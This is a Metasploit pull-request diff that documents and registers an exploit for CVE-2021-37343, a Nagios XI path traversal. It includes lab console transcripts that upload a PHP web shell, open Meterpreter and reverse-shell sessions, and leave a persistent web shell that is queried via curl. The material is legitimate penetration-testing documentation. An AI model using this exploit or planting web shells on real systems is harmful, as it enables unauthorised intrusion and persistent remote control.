rapid7 · space-r7 · Feb 11, 2022 · Feb 6, 2022 · Feb 6, 2022 · Feb 6, 2022
diff --git a/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md b/documentation/modules/exploit/linux/http/nagios_xi_autodiscovery_webshell.md
@@ -0,0 +1,226 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). The path
+traversal allows a remote and authenticated administrator to upload a PHP web shell and execute code as
+`www-data`. The module achieves this by creating an autodiscovery job with an `id` field containing a
+path traversal to a writable and remotely accessible directory, and `custom_ports` field containing
+the web shell. A cron file will be created using the attacker's chosen path and name, and the web
+shell is embedded in the file.
+
+After the web shell has been written to the victim, this module will then use the webshell to establish
+a Meterpreter session or a reverse shell. By default, the web shell is deleted by the module, and the
+autodiscovery job is removed as well.
+
+### Installation
+
+The following was tested on Ubuntu 20.04.
+
+* wget https://assets.nagios.com/downloads/nagiosxi/5/xi-5.8.4.tar.gz
+* tar -xvf xi-5.8.4.tar.gz
+* cd nagiosxi
+* sudo ./fullinstall
+
+The installer will spend a good deal of time installing many things. Upon completion, navigate to
+the Web UI, accept license agreements, and configure the administrator username and password.
+
+## Verification Steps
+
+* Follow the instructions above to install Nagios XI 5.8.4 on Ubuntu 20.04
+* Do: `use exploit/linux/http/nagios_xi_autodiscovery_webshell`
+* Do: `set RHOST <ip>`
+* Do: `set PASSWORD <password>`
+* Do: `check`
+* Verify the target is flagged as vulnerable
+* Do: `set LHOST <ip>`
+* Do: `run`
+* You should get a Meterpreter session.
+
+## Options
+
+### TARGETURI
+
+Specifies base URI. The default value is `/nagiosxi`.
+
+### USERNAME
+
+The username to log in to the Nagios XI web interface with. The default is `nagiosadmin`.
+
+### PASSWORD
+
+The password to log in with. Set to `nil` by default.
+
+### DEPTH
+
+The depth of the path traversal. Default is 10.
+
+### WEBSHELL_NAME
+
+Allows the user to name the webshell. If the user doesn't provided a name then one will be automatically generated.
+Set to `nil` by default.
+
+### DELETE_WEBSHELL
+
+Indicates if the web shell should be deleted after the meterpreter session or reverse shell is established.
+A user may want to leave behind a web shell for persistence reasons. The default is `true`.
+
+## Scenarios
+
+### Nagios XI 5.8.4 - Get a Meterpreter Session
+
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
+
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.8.4
+[+] The target appears to be vulnerable to the following 1 exploit(s):
+[*] 
+[*] 	CVE-2021-37343    exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
+
+[*] Started reverse TCP handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
+[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
+[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
+[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
+[*] Sending stage (989032 bytes) to 10.0.0.6
+[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/fJHspzgor.php
+[*] Command Stager progress - 100.00% done (700/700 bytes)
+[*] Deleting autodiscovery job
+[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44224 ) at 2022-02-05 17:53:27 -0800
+
+meterpreter > shell
+Process 800816 created.
+Channel 1 created.
+uname -a
+Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+whoami
+www-data
+pwd
+/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
+```
+
+### Nagios XI 5.8.4 - Get a reverse shell
+
+```
+msf6 > use auxiliary/scanner/http/nagios_xi_scanner
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > run
+
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.8.4
+[+] The target appears to be vulnerable to the following 1 exploit(s):
+[*] 
+[*] 	CVE-2021-37343    exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] 
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/nagios_xi_scanner) > use exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set target 0
+target => 0
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
+
+[*] Started reverse double SSL handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
+[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
+[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
+[*] Executing Unix Command for cmd/unix/reverse_openssl
+[*] Deleting autodiscovery job
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo nyjlVFXNgWehsWFs;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "nyjlVFXNgWehsWFs\n"
+[*] Matching...
+[*] A is input...
+[+] Deleted /usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/OalF9GV4AC.php
+[*] Command shell session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44226 ) at 2022-02-05 17:56:49 -0800
+
+whoami
+www-data
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
+pwd
+/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp
+```
+
+### Nagios XI 5.8.4 - Leave a web shell behind
+
+```
+msf6 > use exploit/linux/http/nagios_xi_autodiscovery_webshell
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set RHOST 10.0.0.6
+RHOST => 10.0.0.6
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set LHOST 10.0.0.3
+LHOST => 10.0.0.3
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set DELETE_WEBSHELL false
+DELETE_WEBSHELL => false
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > set WEBSHELL_NAME lobster.php
+WEBSHELL_NAME => lobster.php
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > run
+
+[*] Started reverse TCP handler on 10.0.0.3:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] The target appears to be vulnerable. Determined using the self-reported version: 5.8.4
+[*] Attempting to grab a CSRF token from /nagiosxi/includes/components/autodiscovery/?mode=newjob
+[*] Uploading webshell to /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
+[*] Testing if web shell installation was successful
+[+] Web shell installed at /nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php
+[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
+[*] Sending stage (989032 bytes) to 10.0.0.6
+[*] Command Stager progress - 100.00% done (700/700 bytes)
+[*] Deleting autodiscovery job
+[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.6:44230 ) at 2022-02-05 18:07:14 -0800
+
+meterpreter > quit
+[*] Shutting down Meterpreter...
+
+[*] 10.0.0.6 - Meterpreter session 1 closed.  Reason: User exit
+msf6 exploit(linux/http/nagios_xi_autodiscovery_webshell) > exit
+albinolobster@ubuntu:~/metasploit-framework$ curl --insecure https://10.0.0.6/nagiosxi/includes/components/highcharts/exporting-server/temp/lobster.php?cmd=id
+0 9 * * *	rm -f '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml'; touch '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch'; sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses='127.0.0.1/0' --exclude='' --output='../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.xml' --watch='/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.watch' --onlynew=0 --debug=1 --detectos=1 --detecttopo=1   --customports='uid=33(www-data) gid=33(www-data) groups=33(www-data),135(Debian-snmp),1001(nagios),1002(nagcmd)
+' > '/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/../../../../../../../../../../../../../../../../../../../../../../../../../../../../usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/lobster.php.out' 2>&1 & echo $! > /dev/null 2>&1
+```
diff --git a/lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb b/lib/msf/core/exploit/remote/http/nagios_xi/rce_check.rb
@@ -1,18 +1,19 @@
 # -*- coding: binary -*-
 
+# Scans a Nagios XI target and suggests exploit modules to use
 module Msf::Exploit::Remote::HTTP::NagiosXi::RceCheck
   # Uses the Nagios XI version to check which CVEs and related exploit modules the target is vulnerable to, if any
   #
   # @param version [Rex::Version] Nagios XI version
   # @return [Hash], Hash mapping CVE numbers to exploit module names if the target is vulnerable, empty hash otherwise
-   def nagios_xi_rce_check(version)
+  def nagios_xi_rce_check(version)
     matching_exploits = {}
 
     # Storage area for known exploits that affect versions prior to the one in the hash key
     nagios_rce_version_prior = {
       '5.2.8' => [
         ['NO CVE AVAILABLE', 'nagios_xi_chained_rce']
-      ],
+      ]
     }
 
     nagios_rce_version_prior.each do |fixed_version, info|
@@ -53,10 +54,13 @@ def nagios_xi_rce_check(version)
       '5.6.0-5.7.3' => [
         ['CVE-2020-5791', 'nagios_xi_mibs_authenticated_rce']
       ],
+      '5.2.0-5.8.4' => [
+        ['CVE-2021-37343', 'nagios_xi_autodiscovery_webshell']
+      ]
     }
 
     nagios_rce_version_range.each do |fixed_version, info|
-      lower, higher = fixed_version.split("-")
+      lower, higher = fixed_version.split('-')
       lower = Rex::Version.new(lower)
       higher = Rex::Version.new(higher)
       if version >= lower && version <= higher

diff --git a/modules/auxiliary/scanner/http/nagios_xi_scanner.rb b/modules/auxiliary/scanner/http/nagios_xi_scanner.rb
@@ -27,7 +27,8 @@ def initialize
         ['CVE', '2019-15949'],
         ['CVE', '2020-5791'],
         ['CVE', '2020-5792'],
-        ['CVE', '2020-35578']
+        ['CVE', '2020-35578'],
+        ['CVE', '2021-37343']
       ]
     )
     register_options [